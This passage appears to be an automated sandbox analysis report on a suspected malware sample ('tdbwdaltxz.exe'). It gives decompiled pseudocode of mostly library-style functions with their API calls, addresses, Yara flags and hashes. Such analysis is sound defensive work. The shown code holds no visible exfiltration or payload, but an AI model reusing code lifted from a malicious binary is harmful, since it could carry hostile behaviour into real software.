										goto L19;
									} else {
										goto L16;
									}
									do {
										L16:
										_t33 = _t33 + 4;
										_t52 = _t52 + 1;
									} while ( *_t33 != 0);
									goto L17;
								}
								E0040650B(_v12);
								goto L18;
							}
							 *0x415f94 = _t61;
							 *0x415f8c = _v8 - 1;
							goto L12;
						} else {
							_t41 = E0040649B();
							_push(0xc);
							_pop(0);
							 *_t41 = 0;
							L12:
							E0040650B(0);
							_t36 = 0;
							L19:
							goto L20;
						}
					} else {
						_t42 = E0040649B();
						_t64 = 0x16;
						 *_t42 = _t64;
						E004062A0();
						_t36 = _t64;
						L20:
						return _t36;
					}
				}
				return 0;
			}




















                        0x00404751
                        0x0040475a
                        0x0040475f
                        0x0040476c
                        0x00404798
                        0x0040479e
                        0x004047a4
                        0x004047ac
                        0x004047b3
                        0x004047b3
                        0x004047bb
                        0x004047c2
                        0x004047db
                        0x004047e2
                        0x00404801
                        0x0040480c
                        0x0040482f
                        0x00404831
                        0x00404839
                        0x0040483f
                        0x0040484b
                        0x0040484e
                        0x00404850
                        0x00404854
                        0x0040485e
                        0x0040485f
                        0x00404865
                        0x00404868
                        0x0040486e
                        0x00404873
                        0x00404875
                        0x00404877
                        0x0040487a
                        0x0040487f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404856
                        0x00404856
                        0x00404856
                        0x00404859
                        0x0040485a
                        0x00000000
                        0x00404856
                        0x00404844
                        0x00000000
                        0x00404844
                        0x00404812
                        0x00404818
                        0x00000000
                        0x004047e4
                        0x004047e4
                        0x004047e9
                        0x004047eb
                        0x004047ec
                        0x0040481f
                        0x00404821
                        0x00404826
                        0x00404881
                        0x00000000
                        0x00404882
                        0x00404773
                        0x00404773
                        0x0040477a
                        0x0040477b
                        0x0040477d
                        0x00404782
                        0x00404883
                        0x00000000
                        0x00404883
                        0x0040476c
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: W$ ]A$C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                        • API String ID: 0-1602161335
                        • Opcode ID: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                        • Instruction ID: 516f48771e3ea8525e46061b4c90816104fcc3183a12e04dc85d04e75a492b31
                        • Opcode Fuzzy Hash: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                        • Instruction Fuzzy Hash: 0731D6B6A00214BFD711EF95DC819DFBBACEB85354B11847FF605B7281D6388D018B98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061860 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01061860(WCHAR* _a4) {
				signed int _t12;
				signed int _t13;
				WCHAR* _t14;

				_t14 = _a4;
				lstrcpyW(_t14, _a4);
				_t13 = lstrlenW(_t14);
				if(_t13 == 0) {
					L6:
					if(_t14[_t13] != 0x2e) {
						lstrcatW(_t14, L".msi");
						return _t14;
					} else {
						return 0;
					}
				}
				while(1) {
					_t12 = _t14[_t13] & 0x0000ffff;
					if(_t12 == 0x2e || _t12 == 0x5c || _t12 == 0x2f) {
						goto L6;
					}
					_t13 = _t13 - 1;
					if(_t13 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}






                        0x01061867
                        0x0106186b
                        0x01061878
                        0x0106187c
                        0x01061896
                        0x0106189b
                        0x010618aa
                        0x010618b4
                        0x0106189d
                        0x010618a1
                        0x010618a1
                        0x0106189b
                        0x01061880
                        0x01061880
                        0x01061887
                        0x00000000
                        0x00000000
                        0x01061893
                        0x01061894
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01061894
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: .msi
                        • API String ID: 3050337572-299543723
                        • Opcode ID: 3b09ad3a8fbdbe7cdc998e1f4faaa26930044050e93616d21fe2138c483037aa
                        • Instruction ID: 2b28503e8b71544921f1983f65dbd0f03f0ede55411e0eb7ba914dc37040f837
                        • Opcode Fuzzy Hash: 3b09ad3a8fbdbe7cdc998e1f4faaa26930044050e93616d21fe2138c483037aa
                        • Instruction Fuzzy Hash: F7F05536A012146F8F761B9D94084BEBBDCEFD56A23544866F6C4C6100DB34C4A083D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402BE3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402BE3(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00405A18(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                        0x00402bf0
                        0x00402bf8
                        0x00402c2d
                        0x00402bfa
                        0x00402c03
                        0x00000000
                        0x00402c2a
                        0x00402c29
                        0x00402c29

                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx), ref: 00402BF0
                        • GetLastError.KERNEL32(?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx,00000000,?,00402AB7), ref: 00402BFA
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402C22
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID: api-ms-
                        • API String ID: 3177248105-2084034818
                        • Opcode ID: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                        • Instruction ID: e589de4d7b83ec3a89ad76cef1a63b0294eee27024da7e6f7d3f22e711884464
                        • Opcode Fuzzy Hash: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                        • Instruction Fuzzy Hash: 2CE01230644204B6FB111B62EE0AB1E3A54AB10B55F104831F90DB41E1EBF69964899C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106BB78 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 33%
                        			E0106BB78(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t5;

				_v8 = _v8 & 0x00000000;
				_t5 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetCurrentPackageId");
				if(_t5 == 0) {
					L3:
					return 0;
				} else {
					_push(0);
					_push( &_v8);
					if( *_t5() != 0x7a) {
						goto L3;
					} else {
						return 1;
					}
				}
			}





                        0x0106bb7c
                        0x0106bb91
                        0x0106bb99
                        0x0106bbad
                        0x0106bbb0
                        0x0106bb9b
                        0x0106bb9b
                        0x0106bba0
                        0x0106bba6
                        0x00000000
                        0x0106bba8
                        0x0106bbac
                        0x0106bbac
                        0x0106bba6

                        APIs
                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentPackageId), ref: 0106BB8A
                        • GetProcAddress.KERNEL32(00000000), ref: 0106BB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCurrentPackageId$kernel32.dll
                        • API String ID: 1646373207-142416881
                        • Opcode ID: 53a7a10c1d36222a13d0a6c38533c6d58b2c9b7ab5289691280d944f4fca133f
                        • Instruction ID: ea2607807590a304c42193e561659faa15b428e87842daefd1ed2d67b785583c
                        • Opcode Fuzzy Hash: 53a7a10c1d36222a13d0a6c38533c6d58b2c9b7ab5289691280d944f4fca133f
                        • Instruction Fuzzy Hash: F0E0C272FA030866EB2567F1EC0AF5B369C9700649F100858B197F1080DAB8D20182A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00409F8D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E00409F8D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				signed char* _v48;
				char _v49;
				long _v56;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				signed char* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				char _v108;
				int _v112;
				intOrPtr _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				int _t183;
				signed char* _t186;
				signed int _t190;
				signed char _t191;
				intOrPtr _t194;
				void* _t196;
				long _t197;
				long _t201;
				signed char* _t207;
				void _t209;
				signed char* _t214;
				void* _t221;
				char _t224;
				char* _t228;
				void* _t237;
				long _t243;
				signed int _t244;
				signed char* _t245;
				void* _t255;
				intOrPtr _t261;
				void* _t262;
				struct _OVERLAPPED* _t263;
				intOrPtr* _t264;
				signed int _t265;
				intOrPtr _t266;
				signed int _t271;
				struct _OVERLAPPED* _t274;
				signed int _t276;
				signed char _t281;
				signed int _t285;
				signed char* _t286;
				struct _OVERLAPPED* _t289;
				void* _t292;
				signed int _t293;
				signed int _t295;
				struct _OVERLAPPED* _t296;
				signed char* _t298;
				intOrPtr* _t299;
				void* _t300;
				signed int _t301;
				long _t302;
				signed int _t304;
				signed int _t305;
				void* _t306;
				void* _t307;
				void* _t308;

				_push(0xffffffff);
				_push(0x40d469);
				_push( *[fs:0x0]);
				_t307 = _t306 - 0x74;
				_t174 =  *0x415010; // 0xcf17a32a
				_t175 = _t174 ^ _t305;
				_v20 = _t175;
				_push(_t175);
				 *[fs:0x0] =  &_v16;
				_t177 = _a8;
				_t298 = _a12;
				_t261 = _a20;
				_t265 = (_t177 & 0x0000003f) * 0x38;
				_t285 = _t177 >> 6;
				_v100 = _t298;
				_v64 = _t261;
				_v72 = _t285;
				_v84 = _t265;
				_v104 =  *((intOrPtr*)(_t265 +  *((intOrPtr*)(0x4160f8 + _t285 * 4)) + 0x18));
				_v88 = _a16 + _t298;
				_t183 = GetConsoleOutputCP();
				_t309 =  *((char*)(_t261 + 0x14));
				_v112 = _t183;
				if( *((char*)(_t261 + 0x14)) == 0) {
					E00405940(_t261, _t285, _t309);
				}
				_t299 = _a4;
				_t266 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0xc)) + 8));
				asm("stosd");
				_v116 = _t266;
				asm("stosd");
				asm("stosd");
				_t186 = _v100;
				_t286 = _t186;
				_v48 = _t286;
				if(_t186 < _v88) {
					_t293 = _v84;
					_t263 = 0;
					_v76 = 0;
					while(1) {
						_v49 =  *_t286;
						_t190 = _v72;
						_v68 = _t263;
						_v56 = 1;
						if(_t266 != 0xfde9) {
							goto L22;
						}
						_t274 = _t263;
						_t228 =  *(0x4160f8 + _t190 * 4) + 0x2e + _t293;
						_v76 = _t228;
						while( *_t228 != 0) {
							_t274 =  &(_t274->Internal);
							_t228 = _t228 + 1;
							if(_t274 < 5) {
								continue;
							}
							break;
						}
						_t295 = _v88 - _t286;
						_v56 = _t274;
						if(_t274 <= 0) {
							_t276 =  *((char*)(( *_t286 & 0x000000ff) + 0x415778)) + 1;
							_v80 = _t276;
							__eflags = _t276 - _t295;
							if(_t276 > _t295) {
								__eflags = _t295;
								if(_t295 <= 0) {
									goto L44;
								} else {
									_t301 = _v84;
									do {
										 *((char*)( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t301 + _t263 + 0x2e)) =  *((intOrPtr*)(_t263 + _t286));
										_t263 =  &(_t263->Internal);
										__eflags = _t263 - _t295;
									} while (_t263 < _t295);
									goto L43;
								}
								L52:
							} else {
								_v132 = _t263;
								__eflags = _t276 - 4;
								_v128 = _t263;
								_v60 = _t286;
								_v56 = (_t276 == 4) + 1;
								_t237 = E0040AD3D( &_v132,  &_v68,  &_v60, (_t276 == 4) + 1,  &_v132, _v64);
								_t308 = _t307 + 0x14;
								__eflags = _t237 - 0xffffffff;
								if(_t237 != 0xffffffff) {
									_t293 = _v84;
									goto L21;
								}
							}
						} else {
							_t243 =  *((char*)(( *_v76 & 0x000000ff) + 0x415778)) + 1;
							_v60 = _t243;
							_t244 = _t243 - _t274;
							_v80 = _t244;
							if(_t244 > _t295) {
								__eflags = _t295;
								if(_t295 > 0) {
									_t245 = _v48;
									_t302 = _v56;
									do {
										_t281 =  *((intOrPtr*)(_t263 + _t245));
										_t286 =  *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _v84 + _t263;
										_t263 =  &(_t263->Internal);
										_t286[_t302 + 0x2e] = _t281;
										__eflags = _t263 - _t295;
									} while (_t263 < _t295);
									L43:
									_t299 = _a4;
								}
								L44:
								 *(_t299 + 4) =  &(( *(_t299 + 4))[_t295]);
							} else {
								_t296 = _t263;
								_t264 = _v76;
								do {
									 *((char*)(_t305 + _t296 - 0x18)) =  *_t264;
									_t296 =  &(_t296->Internal);
									_t264 = _t264 + 1;
								} while (_t296 < _t274);
								_t303 = _v80;
								_t263 = 0;
								if(_v80 > 0) {
									E00403120( &_v28 + _t274, _t286, _t303);
									_t274 = _v56;
									_t307 = _t307 + 0xc;
								}
								_t293 = _v84;
								_t289 = _t263;
								_t304 = _v72;
								do {
									 *( *((intOrPtr*)(0x4160f8 + _t304 * 4)) + _t293 + _t289 + 0x2e) = _t263;
									_t289 =  &(_t289->Internal);
								} while (_t289 < _t274);
								_t299 = _a4;
								_v108 =  &_v28;
								_v124 = _t263;
								_v120 = _t263;
								_v56 = (_v60 == 4) + 1;
								_t255 = E0040AD3D( &_v124,  &_v68,  &_v108, (_v60 == 4) + 1,  &_v124, _v64);
								_t308 = _t307 + 0x14;
								if(_t255 != 0xffffffff) {
									L21:
									_t197 =  &(_v48[_v80]) - 1;
									L31:
									_v48 = _t197 + 1;
									_t201 = E00407464(_v112, _t263,  &_v68, _v56,  &_v44, 5, _t263, _t263);
									_t307 = _t308 + 0x20;
									_v60 = _t201;
									if(_t201 != 0) {
										if(WriteFile(_v104,  &_v44, _t201,  &_v96, _t263) == 0) {
											L50:
											 *_t299 = GetLastError();
										} else {
											_t286 = _v48;
											_t207 =  *((intOrPtr*)(_t299 + 8)) - _v100 + _t286;
											_v76 = _t207;
											 *(_t299 + 4) = _t207;
											if(_v96 >= _v60) {
												if(_v49 != 0xa) {
													L38:
													if(_t286 < _v88) {
														_t266 = _v116;
														continue;
													}
												} else {
													_t209 = 0xd;
													_v92 = _t209;
													if(WriteFile(_v104,  &_v92, 1,  &_v96, _t263) == 0) {
														goto L50;
													} else {
														if(_v96 >= 1) {
															 *((intOrPtr*)(_t299 + 8)) =  *((intOrPtr*)(_t299 + 8)) + 1;
															 *(_t299 + 4) =  &(( *(_t299 + 4))[1]);
															_t286 = _v48;
															_v76 =  *(_t299 + 4);
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L22:
						_t271 =  *(0x4160f8 + _t190 * 4);
						_v80 = _t271;
						_t191 =  *((intOrPtr*)(_t271 + _t293 + 0x2d));
						__eflags = _t191 & 0x00000004;
						if((_t191 & 0x00000004) == 0) {
							_t271 =  *_t286 & 0x000000ff;
							_t194 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
							__eflags =  *((intOrPtr*)(_t194 + _t271 * 2)) - _t263;
							if( *((intOrPtr*)(_t194 + _t271 * 2)) >= _t263) {
								_push(_v64);
								_push(1);
								_push(_t286);
								goto L29;
							} else {
								_t214 =  &(_t286[1]);
								_v60 = _t214;
								__eflags = _t214 - _v88;
								if(_t214 >= _v88) {
									 *((char*)(_v80 + _t293 + 0x2e)) =  *_t286;
									 *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) =  *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) | 0x00000004;
									 *(_t299 + 4) =  &(_v76[1]);
								} else {
									_t221 = E0040942F(_t271, _t286,  &_v68, _t286, 2, _v64);
									_t308 = _t307 + 0x10;
									__eflags = _t221 - 0xffffffff;
									if(_t221 != 0xffffffff) {
										_t197 = _v60;
										goto L31;
									}
								}
							}
						} else {
							_push(_v64);
							_v36 =  *(_t271 + _t293 + 0x2e) & 0x000000fb;
							_t224 =  *_t286;
							_v35 = _t224;
							 *((char*)(_t271 + _t293 + 0x2d)) = _t224;
							_push(2);
							_push( &_v36);
							L29:
							_push( &_v68);
							_t196 = E0040942F(_t271, _t286);
							_t308 = _t307 + 0x10;
							__eflags = _t196 - 0xffffffff;
							if(_t196 != 0xffffffff) {
								_t197 = _v48;
								goto L31;
							}
						}
						goto L51;
					}
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t292);
				_pop(_t300);
				_pop(_t262);
				__eflags = _v20 ^ _t305;
				return E004018D4(_t299, _t262, _v20 ^ _t305, _t286, _t292, _t300);
				goto L52;
			}



















































































                        0x00409f92
                        0x00409f94
                        0x00409f9f
                        0x00409fa0
                        0x00409fa3
                        0x00409fa8
                        0x00409faa
                        0x00409fb0
                        0x00409fb4
                        0x00409fba
                        0x00409fbf
                        0x00409fc5
                        0x00409fc8
                        0x00409fcb
                        0x00409fce
                        0x00409fd1
                        0x00409fd4
                        0x00409fde
                        0x00409fe5
                        0x00409fed
                        0x00409ff0
                        0x00409ff6
                        0x00409ffa
                        0x00409ffd
                        0x0040a001
                        0x0040a001
                        0x0040a009
                        0x0040a00e
                        0x0040a013
                        0x0040a014
                        0x0040a017
                        0x0040a018
                        0x0040a019
                        0x0040a01c
                        0x0040a01e
                        0x0040a024
                        0x0040a02a
                        0x0040a02d
                        0x0040a02f
                        0x0040a032
                        0x0040a034
                        0x0040a037
                        0x0040a03a
                        0x0040a03d
                        0x0040a04a
                        0x00000000
                        0x00000000
                        0x0040a057
                        0x0040a05c
                        0x0040a05e
                        0x0040a061
                        0x0040a066
                        0x0040a067
                        0x0040a06b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040a06b
                        0x0040a070
                        0x0040a072
                        0x0040a077
                        0x0040a12b
                        0x0040a12c
                        0x0040a12f
                        0x0040a131
                        0x0040a2e9
                        0x0040a2eb
                        0x00000000
                        0x0040a2ed
                        0x0040a2ed
                        0x0040a2f0
                        0x0040a2ff
                        0x0040a303
                        0x0040a304
                        0x0040a304
                        0x00000000
                        0x0040a308
                        0x00000000
                        0x0040a137
                        0x0040a13c
                        0x0040a13f
                        0x0040a142
                        0x0040a148
                        0x0040a151
                        0x0040a15c
                        0x0040a161
                        0x0040a164
                        0x0040a167
                        0x0040a16d
                        0x00000000
                        0x0040a16d
                        0x0040a167
                        0x0040a07d
                        0x0040a08a
                        0x0040a08b
                        0x0040a08e
                        0x0040a090
                        0x0040a095
                        0x0040a2bc
                        0x0040a2be
                        0x0040a2c0
                        0x0040a2c3
                        0x0040a2c6
                        0x0040a2d3
                        0x0040a2d6
                        0x0040a2d8
                        0x0040a2d9
                        0x0040a2dd
                        0x0040a2dd
                        0x0040a2e1
                        0x0040a2e1
                        0x0040a2e1
                        0x0040a2e4
                        0x0040a2e4
                        0x0040a09b
                        0x0040a09b
                        0x0040a09d
                        0x0040a0a0
                        0x0040a0a2
                        0x0040a0a6
                        0x0040a0a7
                        0x0040a0a8
                        0x0040a0ac
                        0x0040a0af
                        0x0040a0b3
                        0x0040a0bd
                        0x0040a0c2
                        0x0040a0c5
                        0x0040a0c5
                        0x0040a0c8
                        0x0040a0cb
                        0x0040a0cd
                        0x0040a0d0
                        0x0040a0d9
                        0x0040a0dd
                        0x0040a0de
                        0x0040a0e5
                        0x0040a0eb
                        0x0040a0f3
                        0x0040a0fe
                        0x0040a103
                        0x0040a10e
                        0x0040a113
                        0x0040a119
                        0x0040a170
                        0x0040a176
                        0x0040a20b
                        0x0040a210
                        0x0040a222
                        0x0040a227
                        0x0040a22a
                        0x0040a22f
                        0x0040a24a
                        0x0040a32b
                        0x0040a331
                        0x0040a250
                        0x0040a256
                        0x0040a259
                        0x0040a25b
                        0x0040a25e
                        0x0040a267
                        0x0040a271
                        0x0040a2af
                        0x0040a2b2
                        0x0040a2b4
                        0x00000000
                        0x0040a2b4
                        0x0040a273
                        0x0040a275
                        0x0040a277
                        0x0040a290
                        0x00000000
                        0x0040a296
                        0x0040a29a
                        0x0040a2a0
                        0x0040a2a3
                        0x0040a2a9
                        0x0040a2ac
                        0x00000000
                        0x0040a2ac
                        0x0040a29a
                        0x0040a290
                        0x0040a271
                        0x0040a267
                        0x0040a24a
                        0x0040a22f
                        0x0040a119
                        0x0040a095
                        0x00000000
                        0x0040a17c
                        0x0040a17c
                        0x0040a183
                        0x0040a186
                        0x0040a18a
                        0x0040a18d
                        0x0040a1b0
                        0x0040a1b6
                        0x0040a1b8
                        0x0040a1bc
                        0x0040a1ed
                        0x0040a1f0
                        0x0040a1f2
                        0x00000000
                        0x0040a1be
                        0x0040a1be
                        0x0040a1c1
                        0x0040a1c4
                        0x0040a1c7
                        0x0040a30f
                        0x0040a31d
                        0x0040a326
                        0x0040a1cd
                        0x0040a1d7
                        0x0040a1dc
                        0x0040a1df
                        0x0040a1e2
                        0x0040a1e8
                        0x00000000
                        0x0040a1e8
                        0x0040a1e2
                        0x0040a1c7
                        0x0040a18f
                        0x0040a196
                        0x0040a199
                        0x0040a19c
                        0x0040a19e
                        0x0040a1a1
                        0x0040a1a8
                        0x0040a1aa
                        0x0040a1f3
                        0x0040a1f6
                        0x0040a1f7
                        0x0040a1fc
                        0x0040a1ff
                        0x0040a202
                        0x0040a208
                        0x00000000
                        0x0040a208
                        0x0040a202
                        0x00000000
                        0x0040a18d
                        0x0040a032
                        0x0040a333
                        0x0040a338
                        0x0040a340
                        0x0040a341
                        0x0040a342
                        0x0040a346
                        0x0040a34e
                        0x00000000

                        APIs
                        • GetConsoleOutputCP.KERNEL32(CF17A32A,00000000,00000000,00000008), ref: 00409FF0
                          • Part of subcall function 00407464: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00409C6B,?,00000000,-00000008), ref: 004074C5
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040A242
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040A288
                        • GetLastError.KERNEL32 ref: 0040A32B
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                        • Instruction ID: 286eb15663e9a8c4fe1ad12a89817a662dc5e0061b0541279607a600132331f4
                        • Opcode Fuzzy Hash: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                        • Instruction Fuzzy Hash: 47D18BB5D042589FCB14CFA8C8809EDBBB4FF08304F14817AE866FB391D634A956CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010615A0 Relevance: 6.3, APIs: 5, Instructions: 60memorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E010615A0(void* __ecx, WCHAR* _a4) {
				WCHAR* _v8;
				WCHAR* _t15;
				int _t20;
				intOrPtr* _t22;
				void* _t27;
				int _t29;
				intOrPtr* _t32;
				WCHAR* _t33;
				WCHAR* _t35;
				WCHAR* _t36;

				_t22 = _a4;
				_t27 = 1;
				_t32 = _t22;
				if(_t22 != 0) {
					do {
						_t20 = lstrlenW(_t32 + 4);
						_t32 =  *_t32;
						_t27 = _t27 + 1 + _t20;
					} while (_t32 != 0);
				}
				_t15 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
				_t33 = _t15;
				_v8 = _t15;
				_a4 = _t33;
				if(_t22 != 0) {
					do {
						_t35 = _t22 + 4;
						_t29 = lstrlenW(_t35);
						_t36 = _a4;
						lstrcpynW(_t36, _t35, _t29);
						_t33 =  &(_t36[_t29]);
						_a4 = _t33;
						if( *_t22 != 0) {
							 *_t33 = 0x3b;
							_t33 =  &(_t33[1]);
							_a4 = _t33;
						}
						_t22 =  *_t22;
					} while (_t22 != 0);
					_t15 = _v8;
				}
				 *_t33 = 0;
				return _t15;
			}













                        0x010615a5
                        0x010615aa
                        0x010615af
                        0x010615b3
                        0x010615b5
                        0x010615b9
                        0x010615bf
                        0x010615c2
                        0x010615c4
                        0x010615b5
                        0x010615d5
                        0x010615db
                        0x010615dd
                        0x010615e0
                        0x010615e5
                        0x010615f0
                        0x010615f0
                        0x010615fa
                        0x010615fe
                        0x01061602
                        0x0106160b
                        0x0106160e
                        0x01061611
                        0x01061618
                        0x0106161b
                        0x0106161e
                        0x0106161e
                        0x01061621
                        0x01061623
                        0x01061627
                        0x01061627
                        0x0106162d
                        0x01061635

                        APIs
                        • lstrlenW.KERNEL32(?), ref: 010615B9
                        • GetProcessHeap.KERNEL32(00000000), ref: 010615CE
                        • HeapAlloc.KERNEL32(00000000), ref: 010615D5
                        • lstrlenW.KERNEL32(?), ref: 010615F4
                        • lstrcpynW.KERNEL32(?,?,00000000), ref: 01061602
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heaplstrlen$AllocProcesslstrcpyn
                        • String ID:
                        • API String ID: 3934205894-0
                        • Opcode ID: 86d28e5803d29a6b8cc05dcf7667daa43789470126c2053192b2e8e69938652d
                        • Instruction ID: 046c8494578fe25ddda53785ce6509faeddc8c0a349deb4468921b35c8b603d3
                        • Opcode Fuzzy Hash: 86d28e5803d29a6b8cc05dcf7667daa43789470126c2053192b2e8e69938652d
                        • Instruction Fuzzy Hash: 0B11A376900325EFDB218F98C484A9ABBECEF48350F19406AFE85D7204D775AD418BE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403694 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 66%
                        			E00403694(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x413518);
				E00401EE0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
